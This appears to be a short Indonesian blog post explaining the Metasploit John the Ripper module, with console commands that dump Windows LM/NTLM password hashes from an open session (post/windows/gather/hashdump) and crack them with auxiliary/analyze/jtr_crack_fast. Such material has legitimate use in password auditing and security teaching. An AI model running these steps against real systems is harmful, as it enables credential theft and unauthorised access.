Modul John Ripper digunakan untuk mengidentifikasi password yang lemah yang telah diperoleh sebagai file hash atau LANMAN / NTLM hash (hashdump). Tujuan dari modul ini adalah untuk mengcrack password yang lemah dalam waktu singkat.
Untuk meng crack password yang lebih kompleks atau menggunakan daftar kata yang besar, John the Ripper harus digunakan di luar Metasploit. Modul Ini hanya menangani LM / NTLM credentials dari hashdump dan menggunakan wordlist standar..
msf auxiliary(handler) > db_connect -y /opt/framework3/config/database.yml msf auxiliary(handler) > use post/windows/gather/hashdump msf post(hashdump) > set session 1 session => 1 msf post(hashdump) > run
msf post(hashdump) > use auxiliary/analyze/jtr_crack_fast msf auxiliary(jtr_crack_fast) > run
No comments:
Post a Comment